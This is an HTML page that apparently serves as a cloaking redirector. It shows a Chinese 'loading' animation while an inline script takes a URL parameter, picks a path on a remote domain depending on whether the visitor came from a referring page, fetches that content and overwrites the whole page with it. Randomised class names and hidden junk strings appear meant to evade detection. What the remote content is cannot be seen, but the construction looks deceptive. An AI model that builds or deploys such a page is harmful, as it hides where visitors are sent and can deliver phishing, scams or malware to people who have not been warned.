<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .DLOgsyY {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .DLOgsyY .sSPVE5nBqt5 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .DLOgsyY .content {
            line-height: 50px;
            text-align: center
        }

        .DLOgsyY .img {
            width: 100%
        }

        .DLOgsyY .kWZdIr {
            text-align: center
        }

        .DLOgsyY .kWZdIr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .DLOgsyY .kWZdIr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .DLOgsyY .kWZdIr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .DLOgsyY .kWZdIr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .DLOgsyY .kWZdIr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .DLOgsyY .kWZdIr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .DLOgsyY .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ckYJdCZeq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var yoDfeU1 = ckYJdCZeq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ yoDfeU1 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ yoDfeU1 +".html?a=share";
		}
		
        O3V5W5UB=url+"#"+new Date().getTime();
        O3V5W5UB && function() {
            $.get(O3V5W5UB, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >pHTVvayCyc7iAH9clIJsUDwCs4NX9h0j</h1>
<span style='display:none'>bsmp3bzfVVxBwwr5ue4x4gntS3wgQ8t2dzkUR2uQM9c</span>
<li style='display:none' >BAh82DN4vHrrauKegax</li>
<ul style='display:none' >yCefm1aegd7H6bJ80RhcA5g4QFBsFRDIU0yVcMliMQTKnpsWrQZ1gP7NWRtEl</ul><div class="DLOgsyY">
    <div class="sSPVE5nBqt5">
        <div class="kWZdIr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >xcxdjRSDRKRgClR5HYd90pSDa2hC8s82a4aRmx7xq9BhfPiffyCQissKkfF6TDzyKfF2pymtY</li>
<b style='display:none' >lMF4rIKiY6DdzqAO5bXKZxHkrBqqLOuND</b>
<a  href='#' style='display:none'>MS2zIQXh41XVNbCDoDNGTroJMupTKm9FQaix0a5ajz</a>
<li style='display:none' >xcxdjRSDRKRgClR5HYd90pSDa2hC8s82a4aRmx7xq9BhfPiffyCQissKkfF6TDzyKfF2pymtY</li>
<a  href='#' style='display:none'>MS2zIQXh41XVNbCDoDNGTroJMupTKm9FQaix0a5ajz</a>
<li style='display:none' >xcxdjRSDRKRgClR5HYd90pSDa2hC8s82a4aRmx7xq9BhfPiffyCQissKkfF6TDzyKfF2pymtY</li>
<span style='display:none'>h7dOdV2cPVfXiLWpJSI7bX3LJ7DgFAro1Dzn83vfJdWOjPENnourYETpbyBMaRo6pYkx4Q9KsZ3Pg9YTC74lyd3H9yjCyR545</span>
<span style='display:none'>h7dOdV2cPVfXiLWpJSI7bX3LJ7DgFAro1Dzn83vfJdWOjPENnourYETpbyBMaRo6pYkx4Q9KsZ3Pg9YTC74lyd3H9yjCyR545</span></body>
</html>